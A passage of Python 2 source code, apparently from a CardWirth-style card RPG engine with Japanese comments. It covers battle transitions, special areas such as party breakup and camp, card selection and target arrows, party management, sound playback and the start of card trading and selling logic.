fade = data.getint("Property/MusicPath", "fadein", 0)
continue_bgm = data.getbool("Property/MusicPath", "continue", False)
music = self.music[channel]
self.set_battle()
# 戦闘開始アニメーション
sprite = cw.sprite.background.BattleCardImage()
cw.animation.animate_sprite(sprite, "battlestart")
oldareaid = self.areaid
oldbgmpath = (music.path, music.subvolume, music.loopcount, channel)
if self.sdata.pre_battleareadata:
oldareaid = self.sdata.pre_battleareadata[0]
oldbgmpath = self.sdata.pre_battleareadata[1]
# 戦闘音楽を流す
if not continue_bgm:
music.play(path, subvolume=volume, loopcount=loopcount, fade=fade)
self.change_area(areaid, False, bginhrt=True, ttype=("None", "Default"), startbattle=True)
cw.animation.animate_sprite(sprite, "hide")
sprite.remove(cw.cwpy.cardgrp)
self.sdata.pre_battleareadata = (oldareaid, oldbgmpath, (music.path, music.subvolume, music.loopcount, music.channel))
cw.battle.BattleEngine(data)
self.lock_menucards = False
def clear_battlearea(self, areachange=True, eventkeynum=0, startnextbattle=False, is_battlestarting=False):
"""戦闘状態を解除して戦闘前のエリアに戻る。
areachangeがFalseだったら、戦闘前のエリアには戻らない
(戦闘イベントで、エリア移動コンテント等が発動した時用)。
"""
if not cw.cwpy.is_playingscenario():
cw.cwpy.battle = None
return
if self.status == "ScenarioBattle":
if isinstance(self.event.get_selectedmember(), cw.character.Enemy):
self.event.clear_selectedmember()
# 勝利イベントを保持しておく
battleevents = self.sdata.events
if eventkeynum:
self.winevent_areaid = self.areaid
cw.cwpy.battle = None
for pcard in self.get_pcards():
pcard.deck.clear(pcard)
pcard.remove_timedcoupons(True)
for fcard in self.get_fcards():
fcard.deck.clear(fcard)
fcard.remove_timedcoupons(True)
areaid, bgmpath, _battlebgmpath = self.sdata.pre_battleareadata
if not startnextbattle:
self.sdata.pre_battleareadata = None
self.set_scenario()
# BGMを最後に指定されたものに戻す
self.music[bgmpath[3]].play(bgmpath[0], subvolume=bgmpath[1], loopcount=bgmpath[2])
# 一部ステータスは回復
for pcard in self.get_pcards():
if pcard.is_bind() or pcard.mentality <> "Normal":
if pcard.status == "hidden":
pcard.set_bind(0)
pcard.set_mentality("Normal", 0)
pcard.update_image()
else:
self.play_sound("harvest")
pcard.set_bind(0)
pcard.set_mentality("Normal", 0)
cw.animation.animate_sprite(pcard, "hide", battlespeed=True)
pcard.update_image()
cw.animation.animate_sprite(pcard, "deal", battlespeed=True)
if (areachange or (startnextbattle and not is_battlestarting)) and not eventkeynum == 3 and not cw.cwpy.sct.lessthan("1.20", cw.cwpy.sdata.get_versionhint()):
# 勝利・逃走成功時に時間経過
# 戦闘中のエリア移動・敗北イベント・1.20以下は時間経過しない
self.elapse_time()
if self.is_gameover():
self.set_gameover()
return
# NPCの状態を回復
self.sdata.fullrecovery_fcards()
if areachange:
# 戦闘前のエリアに戻る
self.change_area(areaid, False, ttype=("None", "Default"), bginhrt=True)
self.statusbar.change(False)
if eventkeynum:
# 勝利イベント開始
self.event.clear_selectedmember()
self.event.clear_selectedcard()
battleevents.start(keynum=eventkeynum)
self.winevent_areaid = None
def change_specialarea(self, areaid):
"""特殊エリア(エリアIDが負の数)に移動する。"""
updatestatusbar = True
if areaid < 0:
self.pre_areaids.append((self.areaid, self.sdata.data))
# パーティ解散・キャンプエリア移動の場合はエリアチェンジ
if areaid in (cw.AREA_BREAKUP, cw.AREA_CAMP):
if cw.cwpy.ydata:
changed = cw.cwpy.ydata.is_changed()
self.clear_fcardsprites()
force_dealspeed = self.force_dealspeed
self.force_dealspeed = self.setting.dealspeed if self.setting.quickdeal else -1
try:
self.change_area(areaid, quickdeal=True, specialarea=True)
finally:
self.force_dealspeed = force_dealspeed
if cw.cwpy.ydata:
cw.cwpy.ydata._changed = changed
if areaid == cw.AREA_BREAKUP:
self._store_partyrecord()
self.create_poschangearrow()
else:
if areaid not in self.sdata.sparea_mcards:
cw.cwpy.call_dlg("ERROR", text=u"指定された特殊エリア(ID=%s)は存在しません。" % areaid)
self.pre_areaids.pop()
return
self.areaid = areaid
self.sdata.change_data(areaid)
self.pre_mcards.append(self.get_mcards())
self.cardgrp.remove(self.mcards)
self.mcards = []
self.mcards_expandspchars.clear()
self.file_updates.clear()
for mcard in self.sdata.sparea_mcards[areaid]:
self.cardgrp.add(mcard, layer=mcard.layer)
self.mcards.append(mcard)
if mcard.spchars:
self.mcards_expandspchars.add(mcard)
# 特殊エリアのカードはデバッグモードによって
# 表示が切り替わる場合がある
for mcard in self.sdata.sparea_mcards[areaid]:
if (mcard.debug_only and not self.is_debugmode()) or not mcard.is_flagtrue():
mcard.hide()
else:
mcard.deal()
if self.is_autospread():
mcards = self.get_mcards("flagtrue")
self.set_autospread(mcards, 6, False, anime=False)
self.list = self.get_mcards("visible")
self.index = -1
self.set_curtain(curtain_all=True)
self.lock_menucards = False
# ターゲット選択エリア
elif self.selectedheader:
self.clear_fcardsprites()
self.clear_selection()
header = self.selectedheader
owner = header.get_owner()
cardtarget = header.target
if isinstance(owner, cw.sprite.card.EnemyCard):
# 敵の行動を選択する時はターゲットの敵味方を入れ替える
if cardtarget == "Enemy":
cardtarget = "Party"
elif cardtarget == "Party":
cardtarget = "Enemy"
if cardtarget in ("Both", "Enemy", "Party"):
if self.status == "Scenario":
self.set_curtain(target=cardtarget)
elif self.is_battlestatus():
if header.allrange:
if cardtarget == "Party":
targets = self.get_pcards("unreversed")
elif cardtarget == "Enemy":
targets = self.get_ecards("unreversed")
else:
targets = self.get_pcards("unreversed")
targets.extend(self.get_ecards("unreversed"))
owner.set_action(targets, header)
self.clear_specialarea()
else:
self.set_curtain(target=cardtarget)
self.lock_menucards = False
elif cardtarget in ("User", "None"):
if self.status == "Scenario":
if cw.cwpy.setting.confirm_beforeusingcard:
owner.image = owner.get_selectedimage()
def func(owner):
if cw.cwpy.setting.confirm_beforeusingcard:
self.change_selection(owner)
self.call_modaldlg("USECARD")
self.exec_func(func, owner)
elif self.is_battlestatus():
owner.set_action(owner, header)
self.clear_specialarea()
self.lock_menucards = False
updatestatusbar = False
else:
self.lock_menucards = False
if updatestatusbar:
self.exec_func(self.statusbar.change, True)
self.disposition_pcards()
def clear_specialarea(self, redraw=True):
"""特殊エリアに移動する前のエリアに戻る。
areaidが-3(パーティ解散)の場合はエリアチェンジする。
"""
if redraw:
self.clear_inusecardimg()
self.clear_guardcardimg()
self._stored_partyrecord = None
targetselectionarea = False
callpredlg = False
oldareaid = self.areaid
if self.areaid < 0:
self.selectedheader = None
areaid, data = self.pre_areaids.pop()
# キャンプ時は常にカーテン表示
if areaid <> cw.AREA_CAMP:
self.clear_curtain()
# パーティ解散エリア解除の場合
if self.areaid == cw.AREA_BREAKUP:
self.topgrp.empty()
for i, pcard in enumerate(self.get_pcards()):
pcard.index = i
pcard.layer = (pcard.layer[0], pcard.layer[1], i, pcard.layer[3])
self.cardgrp.change_layer(pcard, pcard.layer)
self.disposition_pcards()
# カード移動操作エリアを解除の場合
if oldareaid in cw.AREAS_TRADE:
self.areaid = areaid
self.sdata.change_data(areaid, data=data)
self.cardgrp.remove(self.mcards)
self.mcards = []
self.mcards_expandspchars.clear()
self.file_updates.clear()
for mcard in self.pre_mcards.pop():
if areaid == cw.AREA_CAMP and hasattr(mcard, "layer_t"):
self.cardgrp.add(mcard, layer=mcard.layer_t)
else:
self.cardgrp.add(mcard, layer=mcard.layer)
self.mcards.append(mcard)
if mcard.spchars:
self.mcards_expandspchars.add(mcard)
self.deal_cards()
self.list = self.get_mcards("visible")
self.index = -1
else:
if cw.cwpy.ydata:
changed = cw.cwpy.ydata.is_changed()
# PyLite: TODO :バグってそう
force_dealspeed = self.force_dealspeed
self.force_dealspeed = self.setting.dealspeed if self.setting.quickdeal else -1
try:
self.change_area(areaid, data=data, quickdeal=True, specialarea=True)
finally:
self.force_dealspeed = force_dealspeed
if cw.cwpy.ydata:
cw.cwpy.ydata._changed = changed
elif self.is_battlestatus():
self.clear_curtain()
self.selectedheader = None
if self.battle.is_ready():
self.battle.update_showfcards()
callpredlg = True
else:
# ターゲット選択エリアを解除の場合
self.selectedheader = None
targetselectionarea = True
if self.is_curtained():
self.clear_curtain()
if self.pre_dialogs:
callpredlg = True
def func():
showbuttons = not self.is_playingscenario() or\
(not self.areaid in cw.AREAS_TRADE and self.areaid in cw.AREAS_SP) or\
oldareaid == cw.AREA_CAMP or\
(targetselectionarea and not self.is_runningevent()) or\
(self.is_battlestatus() and self.battle.is_ready())
self.statusbar.change(showbuttons)
self.draw()
self.exec_func(func)
self.disposition_pcards()
if not callpredlg:
self.change_selection(self.selection)
if oldareaid <> cw.AREA_CAMP and redraw:
self.draw()
if callpredlg:
self.call_predlg()
def clean_specials(self):
"""デバッガやF9で強制的なエリア移動等を発生させる時、
特殊エリアにいたりバックログを開いていたりした場合は
クリアして通常状態へ戻す。
"""
if self.is_showingbacklog():
self._is_showingbacklog = False
if self.is_curtained():
self.pre_dialogs = []
if self.areaid in cw.AREAS_TRADE:
self.topgrp.empty()
self.clear_specialarea()
def check_level(self, fromscenario):
"""PCの経験点を確認し、条件を満たしていれば
レベルアップ・ダウン処理を行う。
fromscenarioがTrueであれば同時に完全回復も行う。
"""
for pcard in self.get_pcards():
pcard.adjust_level(fromscenario)
def create_poschangearrow(self):
"""パーティ解散エリアにメンバ位置入替用の
クリック可能スプライトを配置する。
"""
if self.areaid <> cw.AREA_BREAKUP:
return
if 0 <= self.index and isinstance(self.selection, cw.sprite.background.ClickableSprite):
index = self.index
self.clear_selection()
else:
index = -1
self.topgrp.empty()
def get_image():
return self.rsrc.pygamedialogs["REPLACE_POSITION"]
def get_selimage():
bmp = self.rsrc.pygamedialogs["REPLACE_POSITION"].convert_alpha()
return cw.imageretouch.add_lightness(bmp, 64)
bmp = self.rsrc.pygamedialogs["REPLACE_POSITION_noscale"]
w, h = bmp.get_size()
scr_scale = bmp.scr_scale if hasattr(bmp, "scr_scale") else 1
w //= scr_scale
h //= scr_scale
size_noscale = (w, h)
pcards = self.get_pcards()
class Replace(object):
def __init__(self, outer, i):
self.outer = outer
self.index1 = i
self.index2 = i+1
def replace(self):
self.outer.replace_pcardorder(self.index1, self.index2)
seq = []
for i, pcard in enumerate(pcards[0:-1]):
replace = Replace(self, i)
pos_noscale = pcard.get_pos_noscale()
x_noscale = pos_noscale[0] + 95+9/2 - size_noscale[0]/2
y_noscale = pos_noscale[1] - size_noscale[1] - 5
sprite = cw.sprite.background.ClickableSprite(get_image, get_selimage,
(x_noscale, y_noscale),
self.topgrp, replace.replace)
seq.append(sprite)
if index <> -1:
self.index = index
self.list = seq
self.change_selection(self.list[index])
self.draw(clip=cw.s(pygame.Rect((0, 0), cw.SIZE_AREA)))
def replace_pcardorder(self, index1, index2):
"""パーティメンバの位置を入れ替える。"""
if not (self.ydata and self.ydata.party):
return
self.ydata.party.replace_order(index1, index2)
self.create_poschangearrow()
def show_numberofcards(self, type):
"""カードの所持枚数とカード交換スプライトを表示する。"""
if type == "SkillCard":
cardtype = cw.POCKET_SKILL
elif type == "ItemCard":
cardtype = cw.POCKET_ITEM
elif type == "BeastCard":
cardtype = cw.POCKET_BEAST
for pcard in self.get_pcards("unreversed"):
cw.sprite.background.NumberOfCards(pcard, cardtype, self.topgrp)
# カード交換用スプライト
def get_image():
return self.rsrc.pygamedialogs["REPLACE_CARDS"]
def get_selimage():
bmp = self.rsrc.pygamedialogs["REPLACE_CARDS"].convert_alpha()
return cw.imageretouch.add_lightness(bmp, 64)
bmp = self.rsrc.pygamedialogs["REPLACE_CARDS_noscale"]
w, h = bmp.get_size()
scr_scale = bmp.scr_scale if hasattr(bmp, "scr_scale") else 1
w //= scr_scale
h //= scr_scale
size_noscale = (w, h)
pcards = self.get_pcards()
class ReplaceCards(object):
def __init__(self, outer, pcard):
self.outer = outer
self.pcard = pcard
def replace_cards(self):
self.outer.change_selection(self.pcard)
self.outer.call_modaldlg("CARDPOCKET_REPLACE")
seq = []
for pcard in pcards:
if pcard.is_reversed():
continue
if type == "BeastCard":
if not filter(lambda c: c.attachment, pcard.get_pocketcards(cardtype)):
continue
else:
if not pcard.get_pocketcards(cardtype):
continue
replace = ReplaceCards(self, pcard)
pos_noscale = pcard.get_pos_noscale()
x_noscale = pos_noscale[0] + cw.setting.get_resourcesize("CardBg/LARGE")[0] - size_noscale[0] - 2
y_noscale = pos_noscale[1] - size_noscale[1] - 2
sprite = cw.sprite.background.ClickableSprite(get_image, get_selimage,
(x_noscale, y_noscale),
self.topgrp, replace.replace_cards)
seq.append(sprite)
def clear_numberofcards(self):
"""所持枚数表示を消去する。"""
self.topgrp.empty()
#-------------------------------------------------------------------------------
# 選択操作用メソッド
#-------------------------------------------------------------------------------
def clear_selection(self):
"""全ての選択状態を解除する。"""
if self.selection:
self.change_selection(None)
cw.cwpy.update_mousepos()
cw.cwpy.sbargrp.update(cw.cwpy.scr_draw)
def change_selection(self, sprite):
"""引数のスプライトを選択状態にする。
sprite: SelectableSprite
"""
self.has_inputevent = True
sbarbtn1 = isinstance(self.selection, cw.sprite.statusbar.StatusBarButton)
sbarbtn2 = isinstance(sprite, cw.sprite.statusbar.StatusBarButton)
# 現在全員の戦闘行動を表示中か
show_allselectedcards = self._show_allselectedcards
if sprite and not isinstance(sprite, cw.sprite.background.Curtain):
# 特定の誰かが選択された場合は表示を更新
show_allselectedcards = False
elif not self._in_partyarea(self.mousepos):
# パーティ領域より上へマウスカーソルが行ったら表示をクリア
show_allselectedcards = False
if self.selection:
self.selection.image = self.selection.get_unselectedimage()
# カードイベント中にtargetarrow, inusecardimgを消さないため
if not self.is_runningevent():
self.clear_targetarrow()
self.clear_inusecardimg()
if sprite:
sprite.image = sprite.get_selectedimage()
else:
self.index = -1
self.selection = sprite
if (not self.is_runningevent()\
and isinstance(sprite, cw.character.Character)\
and (not self.selectedheader or self.is_battlestatus())\
and sprite.is_analyzable())\
or show_allselectedcards:
seq = itertools.chain(self.get_pcards("unreversed"),
self.get_ecards("unreversed"),
self.get_fcards("unreversed"))
elif not self.is_runningevent() and self.selectedheader and self.selectedheader.get_owner():
seq = [self.selectedheader.get_owner()]
else:
seq = []
for sprite in seq:
if not self.selectedheader or sprite <> self.selectedheader.get_owner():
if not (isinstance(sprite, cw.character.Character)\
and sprite.actiondata\
and sprite.is_analyzable()\
and sprite.status <> "hidden"):
continue
selowner = self.selectedheader and self.selectedheader.get_owner() == sprite
if cw.cwpy.ydata.party and cw.cwpy.ydata.party.backpack == sprite:
mcards = self.get_mcards("visible")
for mcard in mcards:
if isinstance(mcard, cw.sprite.card.MenuCard) and mcard.is_backpack():
sprite = mcard
break
else:
continue
elif cw.cwpy.ydata.storehouse == sprite:
mcards = self.get_mcards("visible")
for mcard in mcards:
if isinstance(mcard, cw.sprite.card.MenuCard) and mcard.is_storehouse():
sprite = mcard
break
else:
continue
self.clear_inusecardimg(sprite)
if selowner:
header = self.selectedheader
targets = []
elif sprite.actiondata:
targets, header, _beasts = sprite.actiondata
else:
targets = []
header = None
if header:
if self.selection == sprite and not selowner:
self.set_inusecardimg(sprite, header, fore=True)
if header.target == "None":
self.set_targetarrow([sprite])
elif targets:
self.set_targetarrow(targets)
elif self.setting.show_allselectedcards or selowner:
alpha = cw.cwpy.setting.get_inusecardalpha(sprite)
self.set_inusecardimg(sprite, header, alpha=alpha)
if self.setting.show_allselectedcards and isinstance(sprite, cw.sprite.card.PlayerCard):
show_allselectedcards = True
self._show_allselectedcards = show_allselectedcards
# ステータスボタン上であれば必ず矢印カーソルとする
if bool(sbarbtn1) <> bool(sbarbtn2):
self.change_cursor(self.cursor, force=True)
def set_inusecardimg(self, owner, header, status="normal", center=False, alpha=255, fore=False):
"""PlayerCardの前に使用中カードの画像を表示。"""
if center or (not owner.inusecardimg and self.background.rect.colliderect(owner.rect) and owner.status <> "hidden"):
inusecard = cw.sprite.background.InuseCardImage(owner, header, status, center, alpha=alpha, fore=fore)
owner.inusecardimg = inusecard
self.inusecards.append(inusecard)
return owner.inusecardimg
def clear_inusecardimg(self, user=None):
"""PlayerCardの前の使用中カードの画像を削除。"""
self._show_allselectedcards = False
if user:
if user.inusecardimg:
user.inusecardimg.group.remove(user.inusecardimg)
self.inusecards.remove(user.inusecardimg)
self.add_lazydraw(user.inusecardimg.rect)
user.inusecardimg = None
else:
for card in self.get_pcards():
card.inusecardimg = None
for card in self.get_mcards():
card.inusecardimg = None
for card in self.inusecards:
card.group.remove(card)
self.add_lazydraw(card.rect)
self.inusecards = []
def clear_inusecardimgfromheader(self, header):
"""表示中の使用中カードの中にheaderのものが
含まれていた場合は削除。
"""
for card in list(self.inusecards):
if card.header == header:
if card.user:
self.clear_inusecardimg(card.user)
if card.user.status <> "hidden":
cw.animation.animate_sprite(card.user, "hide")
cw.animation.animate_sprite(card.user, "deal")
else:
card.group.remove(card)
self.inusecards.remove(card)
self.add_lazydraw(card.rect)
def set_guardcardimg(self, owner, header):
"""PlayerCardの前に回避・抵抗ボーナスカードの画像を表示。"""
if not self.get_guardcardimg() and self.background.rect.colliderect(owner.rect) and owner.status <> "hidden":
card = cw.sprite.background.InuseCardImage(owner, header, status="normal", center=False)
self.guardcards.append(card)
def clear_guardcardimg(self):
"""PlayerCardの前の回避・抵抗ボーナスカードの画像を削除。"""
for card in self.guardcards:
card.group.remove(card)
self.guardcards = []
def set_targetarrow(self, targets):
"""targets(PlayerCard, MenuCard, CastCard)の前に
対象選択の指矢印の画像を表示。
"""
if not self.cardgrp.get_sprites_from_layer(cw.LAYER_TARGET_ARROW):
if not isinstance(targets, (list, tuple)):
if targets.status <> "hidden":
cw.sprite.background.TargetArrow(targets)
else:
for target in targets:
if target.status <> "hidden":
cw.sprite.background.TargetArrow(target)
def clear_targetarrow(self):
"""対象選択の指矢印の画像を削除。"""
self.cardgrp.remove_sprites_of_layer(cw.LAYER_TARGET_ARROW)
def update_selectablelist(self):
"""状況に応じて矢印キーで選択対象となる
カードのリストを更新する。"""
if self.is_pcardsselectable:
if self.is_debugmode() and not self.selectedheader:
self.list = self.get_pcards()
else:
self.list = self.get_pcards("unreversed")
elif self.is_mcardsselectable:
self.list = self.get_mcards("visible")
else:
self.list = []
self.index = -1
def set_curtain(self, target="Both", curtain_all=False):
"""Curtainスプライトをセットする。"""
if not self.is_curtained():
self.is_pcardsselectable = target in ("Both", "Party")
self.is_mcardsselectable = not self.is_battlestatus() or\
target in ("Both", "Enemy")
self.update_selectablelist()
# カード上のカーテン
if not self.is_pcardsselectable:
cards = self.get_pcards()
for card in cards:
cw.sprite.background.Curtain(card, self.cardgrp)
if not self.is_mcardsselectable:
cards = self.get_mcards("visible")
for card in cards:
cw.sprite.background.Curtain(card, self.cardgrp)
# 背景上のカーテン
self.background.set_curtain(curtain_all=curtain_all)
self._curtained = True
self.draw()
def clear_curtain(self):
"""Curtainスプライトを解除する。"""
if self.is_curtained():
self.background.clear_curtain()
self.cardgrp.remove(self.curtains)
self.curtains = []
self._curtained = False
self.is_pcardsselectable = self.ydata and self.ydata.party
self.is_mcardsselectable = True
self.draw()
def cancel_cardcontrol(self):
"""カードの移動や使用の対象選択をキャンセルする。"""
if self.is_curtained():
self.play_sound("click", )
if self.areaid in cw.AREAS_TRADE:
# カード移動選択エリアだったら、事前に開いていたダイアログを開く
self.selectedheader = None
self.call_predlg()
else:
# それ以外だったら特殊エリアをクリアする
self.clear_specialarea(redraw=False)
def is_lockmenucards(self, sprite):
"""メニューカードをクリック出来ない状態か。"""
if isinstance(sprite, (cw.sprite.statusbar.StatusBarButton, cw.sprite.animationcell.AnimationCell)) and\
sprite.selectable_on_event:
return False
return self.lock_menucards or\
self.is_showingdlg() or\
pygame.event.peek(pygame.locals.USEREVENT) or\
self.is_showingbacklog()
#-------------------------------------------------------------------------------
# プレイ用メソッド
#-------------------------------------------------------------------------------
def elapse_time(self, playeronly=False, fromevent=False):
"""時間経過。"""
cw.cwpy.advlog.start_timeelapse()
ccards = self.get_pcards("unreversed")
if not playeronly:
ccards.extend(self.get_ecards("unreversed"))
ccards.extend(self.get_fcards())
try:
for ccard in ccards:
try:
if fromevent:
if cw.cwpy.event.has_selectedmember():
selmember = cw.cwpy.event.get_selectedmember()
cw.cwpy.event.set_selectedmember(None)
else:
selmember = None
selcard = cw.cwpy.event.get_selectedcard()
cw.cwpy.event.set_selectedcard(cw.cwpy.event.get_inusecard())
ccard.set_timeelapse(fromevent=fromevent)
if fromevent:
cw.cwpy.event.set_selectedmember(selmember)
cw.cwpy.event.set_selectedcard(selcard)
except cw.event.EffectBreakError:
if fromevent:
raise
else:
# 時間経過コンテント以外で時間経過が起きている場合、
# 効果中断されても以降のキャラクターの処理は継続
pass
finally:
self._elapse_time = False
def interrupt_adventure(self):
"""冒険の中断。宿画面に遷移する。"""
if self.status == "Scenario":
self.sdata.update_log()
for music in self.music:
music.stop()
cw.util.remove(cw.util.join_paths(cw.tempdir, u"ScenarioLog"))
self.ydata.load_party(None)
if not self.areaid >= 0:
self.areaid, _data = self.pre_areaids[0]
self.set_yado()
def load_party(self, header=None, chgarea=True, newparty=False, loadsprites=True):
"""パーティデータをロードする。
header: PartyHeader。指定しない場合はパーティデータを空にする。
"""
self.ydata.load_party(header)
if chgarea:
if header:
areaid = 2
else:
areaid = 1
self.change_area(areaid, bginhrt=False, resume=True)
elif newparty:
self.cardgrp.remove(self.pcards)
self.pcards = []
if loadsprites:
for i, e in enumerate(self.ydata.party.members):
pos_noscale = (9 + 95 * i + 9 * i, 285)
pcard = cw.sprite.card.PlayerCard(e, pos_noscale=pos_noscale, index=i)
self.show_party()
else:
self.cardgrp.remove(self.pcards)
self.pcards = []
if loadsprites and self.ydata.party:
e = self.ydata.party.members[0]
pcardsnum = len(self.ydata.party.members) - 1
pos_noscale = (9 + 95 * pcardsnum + 9 * pcardsnum, 285)
pcard = cw.sprite.card.PlayerCard(e, pos_noscale=pos_noscale, index=pcardsnum)
pcard.set_pos_noscale(pos_noscale)
cw.animation.animate_sprite(pcard, "deal")
self.is_pcardsselectable = self.ydata and self.ydata.party
def dissolve_party(self, pcard=None, cleararea=True):
"""現在選択中のパーティからpcardを削除する。
pcardがない場合はパーティ全体を解散する。
"""
breakuparea = (self.areaid == cw.AREA_BREAKUP)
if pcard:
if not breakuparea:
return
self.play_sound("page")
pcard.remove_numbercoupon()
pcards = self.get_pcards()
index = pcards.index(pcard)
arrows = self.topgrp.sprites()
sprites = [pcard]
if index < len(arrows):
sprites.append(arrows[index])
elif 0 < index and index == len(arrows):
sprites.append(arrows[-1])
cw.animation.animate_sprites(sprites, "delete")
if breakuparea and pcards:
self.create_poschangearrow()
pcard.data.write_xml()
self.ydata.add_standbys(pcard.data.fpath)
if not self.get_pcards():
self.dissolve_party()
else:
pcards = self.get_pcards()
seq = list(pcards)
if breakuparea:
seq.extend(self.topgrp.sprites())
cw.animation.animate_sprites(seq, "hide")
if breakuparea:
self.topgrp.empty()
for pcard in pcards:
pcard.remove_numbercoupon()
self.cardgrp.remove(pcard)
pcard.data.write_xml()
self.pcards = []
p_money = int(self.ydata.party.data.find("Property/Money").text)
p_members = [member.fpath for member in self.ydata.party.members]
p_backpack = self.ydata.party.backpack[:]
p_backpack.reverse()
for header in p_backpack:
self.trade("STOREHOUSE", header=header, from_event=True, sort=False)
self.ydata.sort_storehouse()
self.ydata.deletedpaths.add(os.path.dirname(self.ydata.party.data.fpath))
self.ydata.party.members = []
self.ydata.load_party(None)
self.ydata.environment.edit("Property/NowSelectingParty", "")
self.ydata.set_money(p_money)
for path in reversed(p_members):
self.ydata.add_standbys(path, sort=False)
self.ydata.sort_standbys()
if breakuparea:
self._save_partyrecord()
if cleararea:
self.pre_areaids[-1] = (1, None)
self.clear_specialarea()
def get_partyrecord(self):
"""現在のパーティ情報の記録を生成して返す。"""
assert bool(self.ydata.party)
class StoredParty(object):
def __init__(self, party):
self.fpath = ""
self.name = party.name
self.money = party.money
self.members = party.members[:]
self.backpack = party.backpack[:]
self.is_suspendlevelup = party.is_suspendlevelup
cw.util.sort_by_attr(self.backpack, "order")
return StoredParty(self.ydata.party)
def _store_partyrecord(self):
"""解散操作前にパーティ情報を記録する。"""
self._stored_partyrecord = self.get_partyrecord()
def _save_partyrecord(self):
"""解散時にパーティ情報をファイルへ記録する。"""
if not self._stored_partyrecord:
return
if not self.setting.autosave_partyrecord:
return
if self.setting.overwrite_partyrecord:
self.ydata.replace_partyrecord(self._stored_partyrecord)
else:
self.ydata.add_partyrecord(self._stored_partyrecord)
def save_partyrecord(self):
"""現在のパーティ情報を記録する。"""
if not self.setting.autosave_partyrecord:
return
if not (self.ydata and self.ydata.party):
return
partyrecord = self.get_partyrecord()
if self.setting.overwrite_partyrecord:
self.ydata.replace_partyrecord(partyrecord)
else:
self.ydata.add_partyrecord(partyrecord)
def play_sound(self, name, from_scenario=False, subvolume=100, loopcount=1, channel=0, fade=0, material_override=False):
if channel < 0 or cw.bassplayer.MAX_SOUND_CHANNELS <= channel:
return
if self <> threading.currentThread():
self.exec_func(self.play_sound, name, from_scenario, subvolume, loopcount, channel, fade)
return
if material_override:
# シナリオ側でスキン付属効果音を上書きする
sound = self.sounds[name]
path = os.path.basename(sound.get_path())
path = os.path.splitext(path)[0]
path = cw.util.join_paths(self.sdata.scedir, path)
path = os.path.basename(cw.util.find_resource(path, cw.M_SND))
inusecard = self.event.get_inusecard()
if self._play_sound_with(path, from_scenario, inusecard=inusecard, subvolume=subvolume, loopcount=loopcount, channel=channel, fade=fade):
return
self.sounds[name].copy().play(from_scenario, subvolume=subvolume, loopcount=loopcount, channel=channel, fade=fade)
def _play_sound_with(self, path, from_scenario, inusecard=None, subvolume=100, loopcount=1, channel=0, fade=0):
if not path:
return False
inusesoundpath = cw.util.get_inusecardmaterialpath(path, cw.M_SND, inusecard)
if os.path.isfile(inusesoundpath):
path = inusesoundpath
else:
path = cw.util.get_materialpath(path, cw.M_SND, system=self.areaid < 0)
if os.path.isfile(path):
cw.util.load_sound(path).play(from_scenario, subvolume=subvolume, loopcount=loopcount, channel=channel, fade=fade)
return True
return False
def play_sound_with(self, path, inusecard=None, subvolume=100, loopcount=1, channel=0, fade=0):
"""効果音を再生する。
シナリオ効果音・スキン効果音を適宜使い分ける。
"""
if not path:
return
if channel < 0 or cw.bassplayer.MAX_SOUND_CHANNELS <= channel:
return
if self._play_sound_with(path, True, inusecard, subvolume=subvolume, loopcount=loopcount, channel=channel, fade=fade):
return
name = cw.util.splitext(os.path.basename(path))[0]
if name in self.skinsounds:
self.skinsounds[name].copy().play(True, subvolume=subvolume, loopcount=loopcount, channel=channel, fade=fade)
def has_sound(self, path):
if not path:
return False
path = cw.util.get_materialpath(path, cw.M_SND, system=self.areaid < 0)
if os.path.isfile(path):
return True
else:
name = cw.util.splitext(os.path.basename(path))[0]
return name in self.skinsounds
#-------------------------------------------------------------------------------
# データ編集・操作用メソッド。
#-------------------------------------------------------------------------------
def trade(self, targettype, target=None, header=None,\
from_event=False, parentdialog=None, toindex=-1,\
insertorder=-1, sort=True, sound=True, party=None,\
from_getcontent=False, call_predlg=True,\
clearinusecard=True, update_image=True):
"""
カードの移動操作を行う。
Getコンテントからこのメソッドを操作する場合は、
ownerはNoneにする。
"""
# カード移動操作用データを読み込む
if self.selectedheader and not header:
assert self.selectedheader
header = self.selectedheader
if not party:
party = self.ydata.party
if party:
is_playingscenario = party.is_adventuring()
else:
is_playingscenario = self.is_playingscenario()
if header.is_backpackheader() and party:
owner = party.backpack
else:
owner = header.get_owner()
# 荷物袋<=>カード置場のため
# ファイルの移動だけで済む場合
move = (targettype in ("BACKPACK", "STOREHOUSE")) and\
((owner == self.ydata.storehouse) or (party and owner == party.backpack)) and\
(not is_playingscenario)
# カード置場・荷物袋内での位置の移動の場合
toself = (targettype == "BACKPACK" and party and owner == party.backpack) or\
(targettype == "STOREHOUSE" and owner == self.ydata.storehouse)
if not toself and not targettype in ("PAWNSHOP", "TRASHBOX"):
header.do_write()
# 移動先を設定。
if targettype == "PLAYERCARD":
target = target
elif targettype == "BACKPACK":
target = party.backpack
elif targettype == "STOREHOUSE":
target = self.ydata.storehouse
elif targettype in ("PAWNSHOP", "TRASHBOX"):
# プレミアカードは売却・破棄できない(イベントからの呼出以外)
if not self.debug and self.setting.protect_premiercard and\
header.premium == "Premium" and not from_event:
if targettype == "PAWNSHOP":
s = self.msgs["error_sell_premier_card"]
self.call_modaldlg("NOTICE", text=s, parentdialog=parentdialog)
elif targettype == "TRASHBOX":
s = self.msgs["error_dump_premier_card"] % (header.name)
self.call_modaldlg("NOTICE", text=s, parentdialog=parentdialog)
return
# スターつきのカードは売却・破棄できない(イベントからの呼出以外)
if self.setting.protect_staredcard and header.star and not from_event:
if targettype == "PAWNSHOP":
s = self.msgs["error_sell_stared_card"]
self.call_modaldlg("NOTICE", text=s, parentdialog=parentdialog)
elif targettype == "TRASHBOX":
s = self.msgs["error_dump_stared_card"]
self.call_modaldlg("NOTICE", text=s, parentdialog=parentdialog)
return
if targettype == "PAWNSHOP":
def calc_price(header):
# 互換動作: 1.30以前ではカードの売値は常に半額
if cw.cwpy.sct.lessthan("1.30", header.versionhint):
return header.price / 2
if header.premium == "Normal":
return header.price / 2
else:
return int(header.price * 0.75)
if header.type == "SkillCard":
price = calc_price(header)
elif header.type == "ItemCard":
if header.maxuselimit == 0:
price = calc_price(header)
else:
# 使用回数がある場合は使うほど売値が減る
price = calc_price(header) * header.uselimit
if header.maxuselimit:
price /= header.maxuselimit
elif header.type == "BeastCard":
price = calc_price(header)
if not from_event and self.setting.confirm_dumpcard:
if sound:
cw.cwpy.play_sound("page")
s = cw.cwpy.msgs["confirm_sell"] % (header.name, price)
self.call_modaldlg("YESNO", text=s, parentdialog=parentdialog)
if self.get_yesnoresult() <> wx.ID_OK:
return
else:
